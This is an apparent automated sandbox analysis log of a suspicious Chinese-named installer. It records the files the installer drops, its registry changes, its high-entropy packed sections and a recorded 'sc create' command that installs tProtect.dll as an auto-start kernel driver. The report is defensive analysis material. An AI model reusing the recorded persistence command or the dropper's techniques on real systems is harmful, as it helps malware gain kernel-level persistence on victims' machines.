Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic file information: File size 5695204 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 00000013.00000003.1399275561.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 00000013.00000003.1399237456.0000000003550000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.19.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A357D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,17_2_00A357D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.drStatic PE information: real checksum: 0x0 should be: 0x34399d
Source: updat4.vac.12.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: update.vac.12.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: real checksum: 0x0 should be: 0x576c76
Source: tProtect.dll.19.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.drStatic PE information: real checksum: 0x0 should be: 0x34399d
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.drStatic PE information: section name: .didata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.drStatic PE information: section name: .didata
Source: 7zr.exe.12.drStatic PE information: section name: .sxdata
Source: update.vac.12.drStatic PE information: section name: .00cfg
Source: update.vac.12.drStatic PE information: section name: .voltbl
Source: update.vac.12.drStatic PE information: section name: .j)q
Source: is-H48MF.tmp.12.drStatic PE information: section name: .xdata
Source: updat4.vac.12.drStatic PE information: section name: .00cfg
Source: updat4.vac.12.drStatic PE information: section name: .voltbl
Source: updat4.vac.12.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C97750B push ecx; ret 12_2_6C97751E
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C820F00 push ss; retn 0001h12_2_6C820F0A
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA44F10 push eax; ret 12_2_6CA44F2E
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9A99F4 push 004AC35Ch; ret 12_2_6C9A9A0E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B45F4 push 00A5C35Ch; ret 17_2_009B460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4FB10 push eax; ret 17_2_00A4FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4FE90 push eax; ret 17_2_00A4FEBE
Source: update.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.12.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.12.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\is-H48MF.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
